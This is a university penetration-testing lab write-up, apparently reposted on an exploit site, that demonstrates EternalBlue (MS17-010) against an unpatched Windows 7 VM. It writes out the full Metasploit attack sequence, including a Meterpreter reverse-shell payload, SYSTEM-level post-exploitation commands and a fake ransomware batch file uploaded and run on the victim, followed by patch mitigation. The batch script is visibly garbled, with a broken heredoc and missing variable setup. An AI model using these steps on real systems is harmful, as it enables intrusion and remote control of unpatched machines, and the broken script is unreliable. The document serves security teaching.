Exploit for CVE-2017-0144

Name: Exploit for CVE-2017-0144
Rating: 5 (143 reviews)
2026-04-23 | CVSS 9.3
## https://sploitus.com/exploit?id=68A71640-577C-524E-BF05-7C40B9834AAC
# EternalBlue Exploit Demonstration (MS17-010)

Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 system, achieving SYSTEM-level access via Meterpreter.

This project also simulates a WannaCry-style ransomware attack (SAFE DEMO) and demonstrates mitigation using the MS17-010 security patch.

---

## Module Information

**Module:** CSCM828 Security Vulnerabilities and Penetration Testing  

**Students:**
- Daniel Nicolas Rentapalli (2548048)  
- Ichhya Koirala (2607189)  

**University:** Swansea University  

---

##  Resources & Downloads

1. **MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption**  
   https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

2. **KB4012212 (Windows 7 x64 Security Update)**  
   https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

3. **Kali Linux (Virtual Machines Download)**  
   https://www.kali.org/get-kali/#kali-virtual-machines

4. **Windows 7 SP1 Home Premium English x64 (ISO)**  
   https://archive.org/details/windows-7-home-prem-english

5. **VMware Workstation Pro**  
   https://www.vmware.com/products/desktop-hyper

---

## 1. Overview

This lab demonstrates:

- Remote exploitation of SMB vulnerability (MS17-010)
- Kernel-level access via EternalBlue
- Meterpreter session establishment
- Post-exploitation techniques
- WannaCry-style ransomware simulation (safe)
- Mitigation through patching

---

## 2. Lab Environment

### Requirements

- VMware Workstation / VirtualBox  
- Minimum 8GB RAM  

### Attacker Machine

- Kali Linux  
- Metasploit Framework  

### Victim Machine

- Windows 7 SP1 x64 (Unpatched)  

### Network

- Host-only / NAT (isolated environment)  
- Ensure both machines can communicate  

⚠️ This lab must be conducted in a fully isolated environment.

---

## 3. Victim Setup (Windows 7)

Run in Administrator Command Prompt:

### Disable Firewall

```
netsh advfirewall set allprofiles state off
```

### Verify SMB Port

```
netstat -an | findstr :445
```

### Disable Updates (for lab stability)

```
sc stop wuauserv
sc config wuauserv start= disabled
```

---

## 4. Attacker Setup (Kali Linux)

### Verify Connectivity

```
ping 
nmap -p 445 
```

---

## 5. Exploitation Steps

### Step 1: Scan Target

```
nmap -p 445 --script smb-vuln-ms17-010 
```

Expected:
- Host is VULNERABLE

---

### Step 2: Run Exploit

```
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 
set LHOST 
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
```

---

### Step 3: Confirm Access

```
meterpreter > getuid
```

Expected:
```
NT AUTHORITY\SYSTEM
```

---

## 6. Post-Exploitation

```
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig
```

### Stable Migration

```
ps
migrate 
```

---

## 7. WannaCry Simulation (SAFE DEMO)

### Create Payload (Kali)

```
cat > /tmp/wannacry64.bat nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF
```

---

### Upload & Execute

```
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
```

---

## 8. Mitigation (Patch Demonstration)

### Step 1: Download Patch

- Visit: https://www.catalog.update.microsoft.com/
- Search: **KB4012212 Windows 7 x64**
- Download the `.msu` file

---

### Step 2: Install Patch

```
wusa.exe KB4012212-x64.msu /quiet /norestart
```

---

### Step 3: Restart

```
shutdown /r /t 0
```

---

### Step 4: Verify Patch

```
systeminfo | findstr KB4012212
```

---

### Step 5: Re-run Exploit

Expected:
- Exploit fails
- No Meterpreter session

---

### Step 6: Verify with Nmap

```
nmap -p 445 --script smb-vuln-ms17-010 
```

Expected:
- NOT VULNERABLE

---

## 9. Troubleshooting

| Issue | Solution |
|------|--------|
| Exploit fails | Check connectivity |
| No session | Disable firewall |
| Session dies | Retry exploit |
| No visible window | Migrate to explorer.exe |

---

## 10. Ethical Considerations

This project is conducted:

- On controlled lab machines only  
- In a fully isolated network  
- For educational purposes only  

Unauthorized use violates:

- UK Computer Misuse Act 1990  

---

## 11. Conclusion

This lab demonstrates:

- Real-world SMB exploitation using EternalBlue  
- SYSTEM-level compromise of Windows 7  
- Ransomware attack simulation (safe)  
- Importance of timely patching